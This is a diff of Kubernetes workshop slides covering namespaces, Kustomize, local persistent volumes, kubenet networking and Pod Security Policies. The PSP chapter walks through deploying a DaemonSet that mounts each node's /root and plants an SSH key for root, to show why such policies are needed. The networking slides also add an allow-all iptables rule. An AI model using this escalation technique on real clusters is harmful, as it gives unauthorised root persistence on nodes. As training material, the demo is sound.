- ... But Helm charts are also more powerful; e.g. they can:
|
||||
|
||||
- use flags to conditionally include resources or blocks
|
||||
|
||||
@@ -70,7 +70,7 @@
|
||||
|
||||
- We need to run `ship init` in a new directory
|
||||
|
||||
- `ship init` requires an URL to a remote repository containing Kubernetes YAML
|
||||
- `ship init` requires a URL to a remote repository containing Kubernetes YAML
|
||||
|
||||
- It will clone that repository and start a web UI
|
||||
|
||||
@@ -88,11 +88,11 @@
|
||||
|
||||
- Change to a new directory:
|
||||
```bash
|
||||
mkdir ~/kubercoins
|
||||
cd ~/kubercoins
|
||||
mkdir ~/kustomcoins
|
||||
cd ~/kustomcoins
|
||||
```
|
||||
|
||||
- Run `ship init` with the kubercoins repository:
|
||||
- Run `ship init` with the kustomcoins repository:
|
||||
```bash
|
||||
ship init https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
@@ -146,3 +146,49 @@
|
||||
|
||||
- We will create a new copy of DockerCoins in another namespace
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace kustomcoins
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
@@ -48,7 +48,7 @@
|
||||
|
||||
- Acknowledge that a lot of tasks are outsourced
|
||||
|
||||
(e.g. if we add "buy / rack / provision machines" in that list)
|
||||
(e.g. if we add "buy/rack/provision machines" in that list)
|
||||
|
||||
---
|
||||
|
||||
@@ -120,9 +120,9 @@
|
||||
|
||||
- Team "build" ships ready-to-run manifests
|
||||
|
||||
(YAML, Helm Charts, Kustomize ...)
|
||||
(YAML, Helm charts, Kustomize ...)
|
||||
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
|
||||
✔️ parity between dev and prod environments
|
||||
|
||||
@@ -150,7 +150,7 @@
|
||||
|
||||
- do we reward on-call duty without encouraging hero syndrome?
|
||||
|
||||
- do we give resources (time, money) to people to learn?
|
||||
- do we give people resources (time, money) to learn?
|
||||
|
||||
---
|
||||
|
||||
@@ -183,9 +183,9 @@ are a few tools that can help us.*
|
||||
|
||||
- If cloud: public vs. private
|
||||
|
||||
- Which vendor / distribution to pick?
|
||||
- Which vendor/distribution to pick?
|
||||
|
||||
- Which versions / features to enable?
|
||||
- Which versions/features to enable?
|
||||
|
||||
---
|
||||
|
||||
@@ -205,6 +205,6 @@ are a few tools that can help us.*
|
||||
|
||||
- Transfer knowledge
|
||||
|
||||
(make sure everyone is on the same page / same level)
|
||||
(make sure everyone is on the same page/level)
|
||||
|
||||
- Iterate!
|
||||
|
||||
268
slides/k8s/local-persistent-volumes.md
Normal file
@@ -0,0 +1,268 @@
|
||||
# Local Persistent Volumes
|
||||
|
||||
- We want to run that Consul cluster *and* actually persist data
|
||||
|
||||
- But we don't have a distributed storage system
|
||||
|
||||
- We are going to use local volumes instead
|
||||
|
||||
(similar conceptually to `hostPath` volumes)
|
||||
|
||||
- We can use local volumes without installing extra plugins
|
||||
|
||||
- However, they are tied to a node
|
||||
|
||||
- If that node goes down, the volume becomes unavailable
|
||||
|
||||
---
|
||||
|
||||
## With or without dynamic provisioning
|
||||
|
||||
- We will deploy a Consul cluster *with* persistence
|
||||
|
||||
- That cluster's StatefulSet will create PVCs
|
||||
|
||||
- These PVCs will remain unbound¹ until we create local volumes manually
|
||||
|
||||
(we will basically do the job of the dynamic provisioner)
|
||||
|
||||
- Then, we will see how to automate that with a dynamic provisioner
|
||||
|
||||
.footnote[¹Unbound = without an associated Persistent Volume.]
|
||||
|
||||
---
|
||||
|
||||
## If we have a dynamic provisioner ...
|
||||
|
||||
- The labs in this section assume that we *do not* have a dynamic provisioner
|
||||
|
||||
- If we do have one, we need to disable it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check if we have a dynamic provisioner:
|
||||
```bash
|
||||
kubectl get storageclass
|
||||
```
|
||||
|
||||
- If the output contains a line with `(default)`, run this command:
|
||||
```bash
|
||||
kubectl annotate sc storageclass.kubernetes.io/is-default-class- --all
|
||||
```
|
||||
|
||||
- Check again that it is no longer marked as `(default)`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Work in a separate namespace
|
||||
|
||||
- To avoid conflicts with existing resources, let's create and use a new namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace orange
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns orange
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
.warning[Make sure to call that namespace `orange`: it is hardcoded in the YAML files.]
|
||||
|
||||
---
|
||||
|
||||
## Deploying Consul
|
||||
|
||||
- We will use a slightly different YAML file
|
||||
|
||||
- The only differences between that file and the previous one are:
|
||||
|
||||
- `volumeClaimTemplates` defined in the Stateful Set spec
|
||||
|
||||
- the corresponding `volumeMounts` in the Pod spec
|
||||
|
||||
- the namespace `orange` used for discovery of Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply the persistent Consul YAML file:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/persistent-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Observing the situation
|
||||
|
||||
- Let's look at Persistent Volume Claims and Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we now have an unbound Persistent Volume Claim:
|
||||
```bash
|
||||
kubectl get pvc
|
||||
```
|
||||
|
||||
- We don't have any Persistent Volume:
|
||||
```bash
|
||||
kubectl get pv
|
||||
```
|
||||
|
||||
- The Pod `consul-0` is not scheduled yet:
|
||||
```bash
|
||||
kubectl get pods -o wide
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Hint: leave these commands running with `-w` in different windows.*
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- In a Stateful Set, the Pods are started one by one
|
||||
|
||||
- `consul-1` won't be created until `consul-0` is running
|
||||
|
||||
- `consul-0` has a dependency on an unbound Persistent Volume Claim
|
||||
|
||||
- The scheduler won't schedule the Pod until the PVC is bound
|
||||
|
||||
(because the PVC might be bound to a volume that is only available on a subset of nodes; for instance, EBS volumes are tied to an availability zone)
|
||||
|
||||
---
|
||||
|
||||
## Creating Persistent Volumes
|
||||
|
||||
- Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4
|
||||
|
||||
- Then create 3 Persistent Volumes corresponding to these directories
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the local directories:
|
||||
```bash
|
||||
for NODE in node2 node3 node4; do
|
||||
ssh $NODE sudo mkdir -p /mnt/consul
|
||||
done
|
||||
```
|
||||
|
||||
- Create the PV objects:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml
|
||||
```
|
||||
|
||||
]
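The actual content of `volumes-for-consul.yaml` may differ, but each PV presumably looks something like this sketch (one per node, with the node name varying; `local` volumes require the `nodeAffinity` section):

```yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-on-node2  # hypothetical name
spec:
  capacity:
    storage: 1Gi         # must satisfy the 1Gi requested by the PVC template
  accessModes:
  - ReadWriteOnce
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values: [ node2 ]
```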
|
||||
|
||||
---
|
||||
|
||||
## Check our Consul cluster
|
||||
|
||||
- The PVs that we created will be automatically matched with the PVCs
|
||||
|
||||
- Once a PVC is bound, its pod can start normally
|
||||
|
||||
- Once the pod `consul-0` has started, `consul-1` can be created, etc.
|
||||
|
||||
- Eventually, our Consul cluster is up, and backed by "persistent" volumes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our Consul cluster indeed has 3 members:
|
||||
```bash
|
||||
kubectl exec consul-0 consul members
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (1/2)
|
||||
|
||||
- The size of the Persistent Volumes is bogus
|
||||
|
||||
(it is used when matching PVs and PVCs together, but there is no actual quota or limit)
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (2/2)
|
||||
|
||||
- This specific example worked because we had exactly 1 free PV per node:
|
||||
|
||||
- if we had created multiple PVs per node ...
|
||||
|
||||
- we could have ended up with two PVCs bound to PVs on the same node ...
|
||||
|
||||
- which would have required two pods to be on the same node ...
|
||||
|
||||
- which is forbidden by the anti-affinity constraints in the StatefulSet
|
||||
|
||||
- To avoid that, we need to associate the PVs with a Storage Class that has:
|
||||
```yaml
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
```
|
||||
(this means that a PVC will be bound to a PV only after being used by a Pod)
|
||||
|
||||
- See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details
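- A sketch of such a Storage Class (the name is an assumption; `kubernetes.io/no-provisioner` means the PVs are created manually):
  ```yaml
  apiVersion: storage.k8s.io/v1
  kind: StorageClass
  metadata:
    name: local-storage  # hypothetical name
  provisioner: kubernetes.io/no-provisioner
  volumeBindingMode: WaitForFirstConsumer
  ```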
|
||||
|
||||
---
|
||||
|
||||
## Bulk provisioning
|
||||
|
||||
- It's not practical to manually create directories and PVs for each app
|
||||
|
||||
- We *could* pre-provision a number of PVs across our fleet
|
||||
|
||||
- We could even automate that with a Daemon Set:
|
||||
|
||||
- creating a number of directories on each node
|
||||
|
||||
- creating the corresponding PV objects
|
||||
|
||||
- We also need to recycle volumes
|
||||
|
||||
- ... This can quickly get out of hand
|
||||
|
||||
---
|
||||
|
||||
## Dynamic provisioning
|
||||
|
||||
- We could also write our own provisioner, which would:
|
||||
|
||||
- watch the PVCs across all namespaces
|
||||
|
||||
- when a PVC is created, create a corresponding PV on a node
|
||||
|
||||
- Or we could use one of the dynamic provisioners for local persistent volumes
|
||||
|
||||
(for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner))
|
||||
|
||||
---
|
||||
|
||||
## Strategies for local persistent volumes
|
||||
|
||||
- Remember, when a node goes down, the volumes on that node become unavailable
|
||||
|
||||
- High availability will require another layer of replication
|
||||
|
||||
(like what we've just seen with Consul; or primary/secondary; etc)
|
||||
|
||||
- Pre-provisioning PVs makes sense for machines with local storage
|
||||
|
||||
(e.g. cloud instance storage; or storage directly attached to a physical machine)
|
||||
|
||||
- Dynamic provisioning makes sense for large numbers of applications
|
||||
|
||||
(when we can't or won't dedicate a whole disk to a volume)
|
||||
|
||||
- It's possible to mix both (using distinct Storage Classes)
|
||||
@@ -6,6 +6,24 @@
|
||||
|
||||
---
|
||||
|
||||
## Requirements
|
||||
|
||||
.warning[The exercises in this chapter should be done *on your local machine*.]
|
||||
|
||||
- `kubectl` is officially available on Linux, macOS, Windows
|
||||
|
||||
(and unofficially anywhere we can build and run Go binaries)
|
||||
|
||||
- You may skip these exercises if you are following along from:
|
||||
|
||||
- a tablet or phone
|
||||
|
||||
- a web-based terminal
|
||||
|
||||
- an environment where you can't install and run new binaries
|
||||
|
||||
---
|
||||
|
||||
## Installing `kubectl`
|
||||
|
||||
- If you already have `kubectl` on your local machine, you can skip this
|
||||
@@ -16,11 +34,11 @@
|
||||
|
||||
- Download the `kubectl` binary from one of these links:
|
||||
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/linux/amd64/kubectl)
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/linux/amd64/kubectl)
|
||||
|
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/darwin/amd64/kubectl)
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/darwin/amd64/kubectl)
|
||||
|
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/windows/amd64/kubectl.exe)
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/windows/amd64/kubectl.exe)
|
||||
|
||||
- On Linux and macOS, make the binary executable with `chmod +x kubectl`
|
||||
|
||||
@@ -57,17 +75,24 @@ Platform:"linux/amd64"}
|
||||
|
||||
---
|
||||
|
||||
## Moving away the existing `~/.kube/config`
|
||||
## Preserving the existing `~/.kube/config`
|
||||
|
||||
- If you already have a `~/.kube/config` file, move it away
|
||||
- If you already have a `~/.kube/config` file, rename it
|
||||
|
||||
(we are going to overwrite it in the following slides!)
|
||||
|
||||
- If you never used `kubectl` on your machine before: nothing to do!
|
||||
|
||||
- If you already used `kubectl` to control a Kubernetes cluster before:
|
||||
.exercise[
|
||||
|
||||
- rename `~/.kube/config` to e.g. `~/.kube/config.bak`
|
||||
- Make a copy of `~/.kube/config`; if you are using macOS or Linux, you can do:
|
||||
```bash
|
||||
cp ~/.kube/config ~/.kube/config.before.training
|
||||
```
|
||||
|
||||
- If you are using Windows, you will need to adapt this command
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -167,4 +192,4 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
We can now utilize the cluster exactly as we did before, ignoring that it's remote.
|
||||
We can now utilize the cluster exactly as we did before, except that it's remote.
|
||||
|
||||
@@ -73,12 +73,12 @@ and a few roles and role bindings (to give fluentd the required permissions).
|
||||
|
||||
- Fluentd runs on each node (thanks to a daemon set)
|
||||
|
||||
- It binds-mounts `/var/log/containers` from the host (to access these files)
|
||||
- It bind-mounts `/var/log/containers` from the host (to access these files)
|
||||
|
||||
- It continuously scans this directory for new files; reads them; parses them
|
||||
|
||||
- Each log line becomes a JSON object, fully annotated with extra information:
|
||||
<br/>container id, pod name, Kubernetes labels ...
|
||||
<br/>container id, pod name, Kubernetes labels...
|
||||
|
||||
- These JSON objects are stored in ElasticSearch
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# Accessing logs from the CLI
|
||||
|
||||
- The `kubectl logs` commands has limitations:
|
||||
- The `kubectl logs` command has limitations:
|
||||
|
||||
- it cannot stream logs from multiple pods at a time
|
||||
|
||||
@@ -12,7 +12,7 @@
|
||||
|
||||
## Doing it manually
|
||||
|
||||
- We *could* (if we were so inclined), write a program or script that would:
|
||||
- We *could* (if we were so inclined) write a program or script that would:
|
||||
|
||||
- take a selector as an argument
|
||||
|
||||
@@ -72,11 +72,11 @@ Exactly what we need!
|
||||
|
||||
## Using Stern
|
||||
|
||||
- There are two ways to specify the pods for which we want to see the logs:
|
||||
- There are two ways to specify the pods whose logs we want to see:
|
||||
|
||||
- `-l` followed by a selector expression (like with many `kubectl` commands)
|
||||
|
||||
- with a "pod query", i.e. a regex used to match pod names
|
||||
- with a "pod query," i.e. a regex used to match pod names
|
||||
|
||||
- These two ways can be combined if necessary
|
||||
|
||||
|
||||
@@ -96,7 +96,7 @@ class: extra-details
|
||||
|
||||
- We need to generate a `kubeconfig` file for kubelet
|
||||
|
||||
- This time, we need to put the IP address of `kubenet1`
|
||||
- This time, we need to put the public IP address of `kubenet1`
|
||||
|
||||
(instead of `localhost` or `127.0.0.1`)
|
||||
|
||||
@@ -104,12 +104,10 @@ class: extra-details
|
||||
|
||||
- Generate the `kubeconfig` file:
|
||||
```bash
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl --kubeconfig ~/kubeconfig config \
|
||||
set-context kubenet --cluster kubenet
|
||||
kubectl --kubeconfig ~/kubeconfig config\
|
||||
use-context kubenet
|
||||
kubectl config set-cluster kubenet --server http://`X.X.X.X`:8080
|
||||
kubectl config set-context kubenet --cluster kubenet
|
||||
kubectl config use-context kubenet
|
||||
cp ~/.kube/config ~/kubeconfig
|
||||
```
|
||||
|
||||
]
|
||||
@@ -197,7 +195,7 @@ class: extra-details
|
||||
|
||||
## Check our pods
|
||||
|
||||
- The pods will be scheduled to the nodes
|
||||
- The pods will be scheduled on the nodes
|
||||
|
||||
- The nodes will pull the `nginx` image, and start the pods
|
||||
|
||||
@@ -327,7 +325,7 @@ class: extra-details
|
||||
|
||||
- We will add the `--network-plugin` and `--pod-cidr` flags
|
||||
|
||||
- We all have a "cluster number" (let's call that `C`)
|
||||
- We all have a "cluster number" (let's call that `C`) printed on your VM info card
|
||||
|
||||
- We will use pod CIDR `10.C.N.0/24` (where `N` is the node number: 1, 2, 3)
|
||||
|
||||
@@ -482,6 +480,23 @@ Sometimes it works, sometimes it doesn't. Why?
|
||||
```bash
|
||||
kubectl get nodes -o wide
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Firewalling
|
||||
|
||||
- By default, Docker prevents containers from using arbitrary IP addresses
|
||||
|
||||
(by setting up iptables rules)
|
||||
|
||||
- We need to allow our containers to use our pod CIDR
|
||||
|
||||
- For simplicity, we will insert a blanket iptables rule allowing all traffic:
|
||||
|
||||
`iptables -I FORWARD -j ACCEPT`
|
||||
|
||||
- This has to be done on every node
|
||||
|
||||
---
|
||||
|
||||
## Setting up routing
|
||||
@@ -490,6 +505,8 @@ Sometimes it works, sometimes it doesn't. Why?
|
||||
|
||||
- Create all the routes on all the nodes (a sketch follows this list)
|
||||
|
||||
- Insert the iptables rule allowing traffic
|
||||
|
||||
- Check that you can ping all the pods from one of the nodes
|
||||
|
||||
- Check that you can `curl` the ClusterIP of the Service successfully
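- As a sketch, the routing step could look like this when run on node 1 (`C` is our cluster number; `X.X.X.X` and `Y.Y.Y.Y` stand for the addresses of node 2 and node 3):
  ```bash
  sudo ip route add 10.C.2.0/24 via X.X.X.X
  sudo ip route add 10.C.3.0/24 via Y.Y.Y.Y
  ```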
|
||||
|
||||
@@ -1,26 +1,65 @@
|
||||
# Namespaces
|
||||
|
||||
- We would like to deploy another copy of DockerCoins on our cluster
|
||||
|
||||
- We could rename all our deployments and services:
|
||||
|
||||
hasher → hasher2, redis → redis2, rng → rng2, etc.
|
||||
|
||||
- That would require updating the code
|
||||
|
||||
- There has to be a better way!
|
||||
|
||||
--
|
||||
|
||||
- As hinted by the title of this section, we will use *namespaces*
|
||||
|
||||
---
|
||||
|
||||
## Identifying a resource
|
||||
|
||||
- We cannot have two resources with the same name
|
||||
|
||||
(Or can we...?)
|
||||
(or can we...?)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources *of the same type* with the same name
|
||||
- We cannot have two resources *of the same kind* with the same name
|
||||
|
||||
(But it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set!)
|
||||
(but it's OK to have an `rng` service, an `rng` deployment, and an `rng` daemon set)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources of the same type with the same name *in the same namespace*
|
||||
- We cannot have two resources of the same kind with the same name *in the same namespace*
|
||||
|
||||
(But it's OK to have e.g. two `rng` services in different namespaces!)
|
||||
(but it's OK to have e.g. two `rng` services in different namespaces)
|
||||
|
||||
--
|
||||
|
||||
- In other words: **the tuple *(type, name, namespace)* needs to be unique**
|
||||
- Except for resources that exist at the *cluster scope*
|
||||
|
||||
(In the resource YAML, the type is called `Kind`)
|
||||
(these do not belong to a namespace)
|
||||
|
||||
---
|
||||
|
||||
## Uniquely identifying a resource
|
||||
|
||||
- For *namespaced* resources:
|
||||
|
||||
the tuple *(kind, name, namespace)* needs to be unique
|
||||
|
||||
- For resources at the *cluster scope*:
|
||||
|
||||
the tuple *(kind, name)* needs to be unique
|
||||
|
||||
.exercise[
|
||||
|
||||
- List resource types again, and check the NAMESPACED column:
|
||||
```bash
|
||||
kubectl api-resources
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -42,12 +81,16 @@
|
||||
|
||||
## Creating namespaces
|
||||
|
||||
- Creating a namespace is done with the `kubectl create namespace` command:
|
||||
- Let's see two identical methods to create a namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- We can use `kubectl create namespace`:
|
||||
```bash
|
||||
kubectl create namespace blue
|
||||
```
|
||||
|
||||
- We can also get fancy and use a very minimal YAML snippet, e.g.:
|
||||
- Or we can construct a very minimal YAML snippet:
|
||||
```bash
|
||||
kubectl apply -f- <<EOF
|
||||
apiVersion: v1
|
||||
@@ -57,9 +100,9 @@
|
||||
EOF
|
||||
```
|
||||
|
||||
- The two methods above are identical
|
||||
]
|
||||
|
||||
- If we are using a tool like Helm, it will create namespaces automatically
|
||||
- Some tools like Helm will create namespaces automatically when needed
|
||||
|
||||
---
|
||||
|
||||
@@ -168,41 +211,28 @@
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Helm
|
||||
## Deploying DockerCoins with YAML files
|
||||
|
||||
*Follow these instructions if you previously created a Helm Chart.*
|
||||
- The GitHub repository `jpetazzo/kubercoins` contains everything we need!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
- Clone the kubercoins repository:
|
||||
```bash
|
||||
helm install dockercoins
|
||||
cd ~
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Create all the DockerCoins resources:
|
||||
```bash
|
||||
kubectl create -f kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
In the last command line, `dockercoins` is just the local path where
|
||||
we created our Helm chart before.
|
||||
If the argument behind `-f` is a directory, all the files in that directory are processed.
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
*Follow these instructions if you previously created a Kustomize overlay.*
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship
|
||||
```
|
||||
|
||||
]
|
||||
The subdirectories are *not* processed, unless we also add the `-R` flag.
|
||||
|
||||
---
|
||||
|
||||
@@ -221,46 +251,7 @@ we created our Helm chart before.
|
||||
|
||||
]
|
||||
|
||||
If the graph shows up but stays at zero, check the next slide!
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
If you did the exercises from the chapter about labels and selectors,
|
||||
the app that you just created may not work, because the `rng` service
|
||||
selector has `enabled=yes` but the pods created by the `rng` daemon set
|
||||
do not have that label.
|
||||
|
||||
How can we troubleshoot that?
|
||||
|
||||
- Query individual services manually
|
||||
|
||||
→ the `rng` service will time out
|
||||
|
||||
- Inspect the services with `kubectl describe service`
|
||||
|
||||
→ the `rng` service will have an empty list of backends
|
||||
|
||||
---
|
||||
|
||||
## Fixing the broken service
|
||||
|
||||
The easiest option is to add the `enabled=yes` label to the relevant pods.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the `enabled` label to the pods of the `rng` daemon set:
|
||||
```bash
|
||||
kubectl label pods -l app=rng enabled=yes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The *best* option is to change either the service definition, or the
|
||||
daemon set definition, so that their respective selectors match correctly.
|
||||
|
||||
*This is left as an exercise for the reader!*
|
||||
If the graph shows up but stays at zero, give it a minute or two!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -307,7 +307,7 @@ This policy selects all pods in the current namespace.
|
||||
|
||||
It allows traffic only from pods in the current namespace.
|
||||
|
||||
(An empty `podSelector` means "all pods".)
|
||||
(An empty `podSelector` means "all pods.")
|
||||
|
||||
```yaml
|
||||
kind: NetworkPolicy
|
||||
@@ -329,7 +329,7 @@ This policy selects all pods with label `app=webui`.
|
||||
|
||||
It allows traffic from any source.
|
||||
|
||||
(An empty `from` fields means "all sources".)
|
||||
(An empty `from` field means "all sources.")
|
||||
|
||||
```yaml
|
||||
kind: NetworkPolicy
|
||||
@@ -412,7 +412,7 @@ troubleshoot easily, without having to poke holes in our firewall.
|
||||
|
||||
- If we block access to the control plane, we might disrupt legitimate code
|
||||
|
||||
- ... Without necessarily improving security
|
||||
- ...Without necessarily improving security
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
set -u
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl create deployment $SERVICE --image=$REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
|
||||
500
slides/k8s/podsecuritypolicy.md
Normal file
@@ -0,0 +1,500 @@
|
||||
# Pod Security Policies
|
||||
|
||||
- By default, our pods and containers can do *everything*
|
||||
|
||||
(including taking over the entire cluster)
|
||||
|
||||
- We are going to show an example of a malicious pod
|
||||
|
||||
- Then we will explain how to avoid this with PodSecurityPolicies
|
||||
|
||||
- We will enable PodSecurityPolicies on our cluster
|
||||
|
||||
- We will create a couple of policies (restricted and permissive)
|
||||
|
||||
- Finally we will see how to use them to improve security on our cluster
|
||||
|
||||
---
|
||||
|
||||
## Setting up a namespace
|
||||
|
||||
- For simplicity, let's work in a separate namespace
|
||||
|
||||
- Let's create a new namespace called "green"
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the "green" namespace:
|
||||
```bash
|
||||
kubectl create namespace green
|
||||
```
|
||||
|
||||
- Change to that namespace:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Creating a basic Deployment
|
||||
|
||||
- Just to check that everything works correctly, deploy NGINX
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a Deployment using the official NGINX image:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment, ReplicaSet, and Pod exist, and that the Pod is running:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## One example of malicious pods
|
||||
|
||||
- We will now show an escalation technique in action
|
||||
|
||||
- We will deploy a DaemonSet that adds our SSH key to the root account
|
||||
|
||||
(on *each* node of the cluster)
|
||||
|
||||
- The Pods of the DaemonSet will do so by mounting `/root` from the host
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the file `k8s/hacktheplanet.yaml` with a text editor:
|
||||
```bash
|
||||
vim ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- If you would like, change the SSH key (by changing the GitHub user name)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the malicious pods
|
||||
|
||||
- Let's deploy our "exploit"!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Check that the pods are running:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
- Confirm that the SSH key was added to the node's root account:
|
||||
```bash
|
||||
sudo cat /root/.ssh/authorized_keys
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cleaning up
|
||||
|
||||
- Before setting up our PodSecurityPolicies, clean up that namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the DaemonSet:
|
||||
```bash
|
||||
kubectl delete daemonset hacktheplanet
|
||||
```
|
||||
|
||||
- Remove the Deployment:
|
||||
```bash
|
||||
kubectl delete deployment web
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in theory
|
||||
|
||||
- To use PSPs, we need to activate their specific *admission controller*
|
||||
|
||||
- That admission controller will intercept each pod creation attempt
|
||||
|
||||
- It will look at:
|
||||
|
||||
- *who/what* is creating the pod
|
||||
|
||||
- which PodSecurityPolicies they can use
|
||||
|
||||
- which PodSecurityPolicies can be used by the Pod's ServiceAccount
|
||||
|
||||
- Then it will compare the Pod with each PodSecurityPolicy one by one
|
||||
|
||||
- If a PodSecurityPolicy accepts all the parameters of the Pod, it is created
|
||||
|
||||
- Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods`
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies fine print
|
||||
|
||||
- With RBAC, using a PSP corresponds to the verb `use` on the PSP
|
||||
|
||||
(that makes sense, right?)
|
||||
|
||||
- If no PSP is defined, no Pod can be created
|
||||
|
||||
(even by cluster admins)
|
||||
|
||||
- Pods that are already running are *not* affected
|
||||
|
||||
- If we create a Pod directly, it can use a PSP to which *we* have access
|
||||
|
||||
- If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different:
|
||||
|
||||
- the ReplicaSet / DaemonSet controllers don't have access to *our* policies
|
||||
|
||||
- therefore, we need to give access to the PSP to the Pod's ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in practice
|
||||
|
||||
- We are going to enable the PodSecurityPolicy admission controller
|
||||
|
||||
- At that point, we won't be able to create any more pods (!)
|
||||
|
||||
- Then we will create a couple of PodSecurityPolicies
|
||||
|
||||
- ...And associated ClusterRoles (giving `use` access to the policies)
|
||||
|
||||
- Then we will create RoleBindings to grant these roles to ServiceAccounts
|
||||
|
||||
- We will verify that we can't run our "exploit" anymore
|
||||
|
||||
---
|
||||
|
||||
